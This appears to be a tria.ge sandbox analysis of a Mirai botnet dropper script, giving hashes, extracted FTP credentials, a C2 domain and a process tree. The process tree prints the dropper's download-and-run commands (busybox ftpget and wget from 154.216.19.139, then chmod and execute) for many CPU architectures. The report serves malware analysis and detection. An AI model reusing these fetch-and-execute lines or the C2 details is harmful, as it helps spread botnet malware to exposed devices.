Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

10

bins.sh

debian-9-armhf

10

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    50s
  • max time network
    109s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240418-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    09/08/2024, 10:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    f064b93641da57ab1b510a06a284bacd

  • SHA1

    77ebf690333960186de349f1ccd1d6ac9df3748a

  • SHA256

    1a8b53d206810f02a59c8a0ce14bd3ff49a31f78802ef24e0a3e63fd4e857b2d

  • SHA512

    02e4910ae45ca7e75053ede74511bcf417a72a1d15fb60c2e44bae30320b0e89dd98d383aefec312b23dca671892d0e1d6991fb45c5d5af0bcf21d84388c0e54

  • SSDEEP

    48:pccGoQSoGFIAw6YQFaak0xrr6TofZKYn6ra/oSY9QJgnmlt6YLupG:+cGoQSoGFhw6ZFaakwrhcsd/+wa4t

Score
10/10
miraimiraibotnetdiscovery

Malware Config

Extracted

Credentials

  • Protocol:     ftp
  • Host:
    154.216.19.139
  • Port:
    21
  • Username:
    anonymous
  • Password:
    busybox@

Extracted

Credentials

  • Protocol:     ftp
  • Host:
    secure.microsoftconnect.net
  • Port:
    21
  • Username:
    anonymous
  • Password:
    busybox@

Extracted

Family

mirai

Botnet

MIRAI

Extracted

Family

mirai

Botnet

MIRAI

C2

secure.microsoftconnect.net

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Contacts a large (5759) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Deletes itself 3 IoCs
  • Executes dropped EXE 15 IoCs
  • Modifies Watchdog functionality 1 TTPs 6 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Enumerates active TCP sockets 1 TTPs 3 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Changes its process name 3 IoCs
  • Reads system network configuration 1 TTPs 3 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 18 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:660
      • /bin/rm
        rm starter
        2⤵
          PID:662
        • /bin/busybox
          busybox ftpget 154.216.19.139 starter /bins/starter.sh
          2⤵
          • Writes file to tmp directory
          PID:664
        • /bin/sh
          sh ./starter
          2⤵
            PID:692
            • /bin/mkdir
              mkdir /tmp/azvFgdBZ
              3⤵
              • Reads runtime system information
              PID:693
            • /bin/busybox
              busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.bin
              3⤵
              • Writes file to tmp directory
              PID:694
            • /bin/chmod
              chmod 0755 ./dvrHelper
              3⤵
                PID:740
              • /tmp/azvFgdBZ/dvrHelper
                ./dvrHelper
                3⤵
                • Executes dropped EXE
                PID:741
              • /bin/busybox
                busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.armv4l
                3⤵
                • Writes file to tmp directory
                PID:743
              • /bin/chmod
                chmod 0755 ./dvrHelper
                3⤵
                  PID:760
                • /tmp/azvFgdBZ/dvrHelper
                  ./dvrHelper
                  3⤵
                  • Deletes itself
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Enumerates active TCP sockets
                  • Changes its process name
                  • Reads system network configuration
                  • Reads runtime system information
                  PID:761
                • /bin/busybox
                  busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.armv5l
                  3⤵
                  • Writes file to tmp directory
                  PID:763
                • /bin/chmod
                  chmod 0755 ./dvrHelper
                  3⤵
                    PID:785
                  • /tmp/azvFgdBZ/dvrHelper
                    ./dvrHelper
                    3⤵
                    • Executes dropped EXE
                    PID:786
                  • /bin/busybox
                    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.armv6l
                    3⤵
                    • Writes file to tmp directory
                    PID:787
                  • /bin/chmod
                    chmod 0755 ./dvrHelper
                    3⤵
                      PID:788
                    • /tmp/azvFgdBZ/dvrHelper
                      ./dvrHelper
                      3⤵
                      • Executes dropped EXE
                      PID:789
                    • /bin/busybox
                      busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.armv7l
                      3⤵
                      • Writes file to tmp directory
                      PID:790
                    • /bin/chmod
                      chmod 0755 ./dvrHelper
                      3⤵
                        PID:791
                      • /tmp/azvFgdBZ/dvrHelper
                        ./dvrHelper
                        3⤵
                        • Deletes itself
                        • Executes dropped EXE
                        • Modifies Watchdog functionality
                        • Enumerates active TCP sockets
                        • Changes its process name
                        • Reads system network configuration
                        • Reads runtime system information
                        PID:792
                      • /bin/busybox
                        busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.i586
                        3⤵
                        • Writes file to tmp directory
                        PID:795
                      • /bin/chmod
                        chmod 0755 ./dvrHelper
                        3⤵
                          PID:805
                        • /tmp/azvFgdBZ/dvrHelper
                          ./dvrHelper
                          3⤵
                          • Executes dropped EXE
                          PID:806
                        • /bin/busybox
                          busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.i686
                          3⤵
                          • Writes file to tmp directory
                          PID:808
                        • /bin/chmod
                          chmod 0755 ./dvrHelper
                          3⤵
                            PID:809
                          • /tmp/azvFgdBZ/dvrHelper
                            ./dvrHelper
                            3⤵
                            • Executes dropped EXE
                            PID:810
                          • /bin/busybox
                            busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.m68k
                            3⤵
                            • Writes file to tmp directory
                            PID:812
                          • /bin/chmod
                            chmod 0755 ./dvrHelper
                            3⤵
                              PID:813
                            • /tmp/azvFgdBZ/dvrHelper
                              ./dvrHelper
                              3⤵
                              • Executes dropped EXE
                              PID:814
                            • /bin/busybox
                              busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.mips
                              3⤵
                                PID:816
                              • /bin/busybox
                                busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.mipsel
                                3⤵
                                • Writes file to tmp directory
                                PID:817
                              • /bin/chmod
                                chmod 0755 ./dvrHelper
                                3⤵
                                  PID:823
                                • /tmp/azvFgdBZ/dvrHelper
                                  ./dvrHelper
                                  3⤵
                                  • Executes dropped EXE
                                  PID:824
                                • /bin/busybox
                                  busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.powerpc
                                  3⤵
                                  • Writes file to tmp directory
                                  PID:826
                                • /bin/chmod
                                  chmod 0755 ./dvrHelper
                                  3⤵
                                    PID:827
                                  • /tmp/azvFgdBZ/dvrHelper
                                    ./dvrHelper
                                    3⤵
                                    • Executes dropped EXE
                                    PID:828
                                  • /bin/busybox
                                    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.sh4
                                    3⤵
                                    • Writes file to tmp directory
                                    PID:830
                                  • /bin/chmod
                                    chmod 0755 ./dvrHelper
                                    3⤵
                                      PID:833
                                    • /tmp/azvFgdBZ/dvrHelper
                                      ./dvrHelper
                                      3⤵
                                      • Executes dropped EXE
                                      PID:834
                                    • /bin/busybox
                                      busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.sparc
                                      3⤵
                                      • Writes file to tmp directory
                                      PID:836
                                    • /bin/chmod
                                      chmod 0755 ./dvrHelper
                                      3⤵
                                        PID:837
                                      • /tmp/azvFgdBZ/dvrHelper
                                        ./dvrHelper
                                        3⤵
                                        • Executes dropped EXE
                                        PID:838
                                      • /bin/busybox
                                        busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.x86_64
                                        3⤵
                                        • Writes file to tmp directory
                                        PID:841
                                      • /bin/chmod
                                        chmod 0755 ./dvrHelper
                                        3⤵
                                          PID:842
                                        • /tmp/azvFgdBZ/dvrHelper
                                          ./dvrHelper
                                          3⤵
                                          • Executes dropped EXE
                                          PID:843
                                        • /bin/busybox
                                          busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.gnueabihf
                                          3⤵
                                          • Writes file to tmp directory
                                          PID:845
                                        • /bin/chmod
                                          chmod 0755 ./dvrHelper
                                          3⤵
                                            PID:846
                                          • /tmp/azvFgdBZ/dvrHelper
                                            ./dvrHelper
                                            3⤵
                                            • Deletes itself
                                            • Executes dropped EXE
                                            • Modifies Watchdog functionality
                                            • Enumerates active TCP sockets
                                            • Changes its process name
                                            • Reads system network configuration
                                            • Reads runtime system information
                                            PID:847
                                          • /bin/busybox
                                            busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.arc
                                            3⤵
                                            • Writes file to tmp directory
                                            PID:850
                                          • /bin/chmod
                                            chmod 0755 ./dvrHelper
                                            3⤵
                                              PID:860
                                            • /tmp/azvFgdBZ/dvrHelper
                                              ./dvrHelper
                                              3⤵
                                              • Executes dropped EXE
                                              PID:861
                                          • /bin/rm
                                            rm dvrHelper
                                            2⤵
                                              PID:863
                                            • /usr/bin/wget
                                              wget http://web.archive.org/web/20240808120223if_/http://154.216.19.139/bins/mirai.bin -O dvrHelper
                                              2⤵
                                              • Writes file to tmp directory
                                              PID:864
                                            • /bin/rm
                                              rm dvrHelper
                                              2⤵
                                                PID:865
                                              • /usr/bin/wget
                                                wget http://web.archive.org/web/20240808120646if_/http://154.216.19.139/bins/mirai.armv4l -O dvrHelper
                                                2⤵
                                                • Writes file to tmp directory
                                                PID:866

                                            Network

                                            MITRE ATT&CK Enterprise v15

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • /tmp/azvFgdBZ/dvrHelper
                                              Filesize

                                              914KB

                                              MD5

                                              6a98f1f740434bb0d3da9a431bb7fefd

                                              SHA1

                                              4d7242cbfa380596d0292c9c9be847862cdb24f1

                                              SHA256

                                              ad3c19afec823def5b53f480eb919b75129dc820dbead758ecc5097d3ddbacef

                                              SHA512

                                              5b76a071270d7c213639bb111903f8c74445a7b5e8af88aab04957c6586332dce7c866a3031ea78544fcffbc3e39b6c90d712d6ab06bbf97a0418d9290de7558

                                              Download Submit

                                            • /tmp/azvFgdBZ/dvrHelper
                                              Filesize

                                              59KB

                                              MD5

                                              b480aeaa8aea4c14f64a18c173446b7e

                                              SHA1

                                              f32fc9d6287db05d9a48a948f4aa2ba04e4b73a4

                                              SHA256

                                              0ab267b78d6c6d1faada747adba0da9f57ce3a7dc1b9a4e968f313dc41d6add1

                                              SHA512

                                              589f02b57d842c5f348c3f50f32a2e8c45ee30d25f61524a58f590780a3558578b4780bb93a69a2419aab7bcf47a929801c77c6e63b8ade436fcc31bb546f4ba

                                              Download Submit

                                            • /tmp/azvFgdBZ/dvrHelper
                                              Filesize

                                              52KB

                                              MD5

                                              239a2559915a73284cc52944dd9c9643

                                              SHA1

                                              8c19ed6b2f40232bd38ec7013ced9b8c9ffa7a3f

                                              SHA256

                                              c8f07011c9d3cd46cdc9d1bc9cef48a36c14defb0f94dd1d3a67e085a6fac55a

                                              SHA512

                                              0eb5b42f41718019a78111e9367e65668c3bcda0f1d469c7ea15fdbef517135ca616cf1bb780f38a835bbed4c932be43d0a9d9152508e866116f6e534c833eec

                                              Download Submit

                                            • /tmp/azvFgdBZ/dvrHelper
                                              Filesize

                                              69KB

                                              MD5

                                              55d936e9afa4b869c8f6fe345c217f1e

                                              SHA1

                                              ffdfbc85c3452cd781a0df555f2a7bad07d86fce

                                              SHA256

                                              b1229bb669f3c7578cbc77e41dec812ec366394bcb344c7c65a5e8fab5fc5164

                                              SHA512

                                              e3e7d62dc810c66ac5c973a4eb6931c251715f065c95d4f5397405c3e32463f5d3732d41f1187c904765c09e6936a0ff8ca0ae2e6f7aa55d0e103d0dde4acdf6

                                              Download Submit

                                            • /tmp/azvFgdBZ/dvrHelper
                                              Filesize

                                              87KB

                                              MD5

                                              47d8efca2764e49c87e24ec8701a426e

                                              SHA1

                                              b3a085cd33cbc24931d9f03bcc13e6e41bb8f44f

                                              SHA256

                                              59560da4441b5e239b5d330890fd163bebc42f3fc6b4b113d8332935b6da0a87

                                              SHA512

                                              4fe12e641522a19f0d25e0380c1f99cca1694257b6e4e038adb561ac78cc20e1c2ca772237282ac24c0bfceac4a9797e96c040b6aea5dfbfea655919c8ff02e8

                                              Download Submit

                                            • /tmp/azvFgdBZ/dvrHelper
                                              Filesize

                                              360KB

                                              MD5

                                              7a81da52d99ff2fe3feacccab9ca5076

                                              SHA1

                                              941ad2b09c6f1de8f9ece786dded59279a51adcc

                                              SHA256

                                              575e7ba6c123a339ef5989852abfbaea24af6df81f4321ea80e8a5d3fd60482f

                                              SHA512

                                              e7146e94216296bc5d0929f9d41688f461fa631f81078040514917f4c397026ee2feba6f04e8fd4a42859a79a85c6c2a9f34404179ae5beeff769700c4cf0295

                                              Download Submit

                                            • /tmp/starter
                                              Filesize

                                              1KB

                                              MD5

                                              7f2ff2a38336a889de920d227574d543

                                              SHA1

                                              58d61a19d9785a51d379547cfbd8326e7474535d

                                              SHA256

                                              f2232fae5a51d77cd7d00264806f08b0435f320b2d81530d7a87fe2fa13982f8

                                              SHA512

                                              ca8d1b911f664f69593da1b5b8a43ea00d324ca74df870eb1bac356eb240492af5e1a5aed8d1fda1c1266adfb577c05788ccfdd6ba387e132e84ad75eefc9feb

                                              Download Submit